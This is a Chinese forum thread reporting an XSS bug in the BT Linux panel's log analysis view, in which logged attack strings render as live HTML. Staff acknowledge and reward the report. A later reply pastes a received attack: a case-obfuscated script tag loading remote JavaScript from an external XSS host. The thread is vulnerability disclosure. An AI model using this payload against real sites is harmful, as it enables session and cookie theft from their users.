当前位置:论坛首页 > BUG提交 > Linux面板

【已完成】非常紧急的Bug,明知道是XSS却还加载

发表在 BUG提交2022-5-18 21:47 [复制链接] 3 4451

网站日志中存在“日志安全分析”板块
当我分析完成后,点击XSS希望查看相关日志的时候
宝塔面板将XSS语句当作了html标签加载了
一瞬间弹出了不少alert
目前尚且不知我宝塔面板的cookie和地址等有无外泄
请立即修复并尽可能强制更新
版本是7.9.0
Edge浏览器
系统:Ubuntu 20.04.4 LTS x86_64(Py3.7.9)
使用道具 举报 只看该作者 回复
发表于 2022-5-19 19:17:54 | 显示全部楼层
感谢反馈,我们这边确认下这个问题。
使用道具 举报 回复 支持 反对
发表于 2022-5-19 19:25:57 | 显示全部楼层
已奖励300宝塔币,明天修复。
使用道具 举报 回复 支持 反对
发表于 2023-4-12 16:46:52 | 显示全部楼层
谢花郎 发表于 2022-5-19 19:25
已奖励300宝塔币,明天修复。

目前nginx防火墙中,post过滤没有xss过滤规则,希望添加上,尽快更新,刚被xss了,上攻击的内容<a href=/xsssafe/>Holle<sCRiPt sRC=//xss.yt/I9Kc></sCrIpT>
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

立即付费处理

工作时间:09:00至24:00

快速回复 返回顶部 返回列表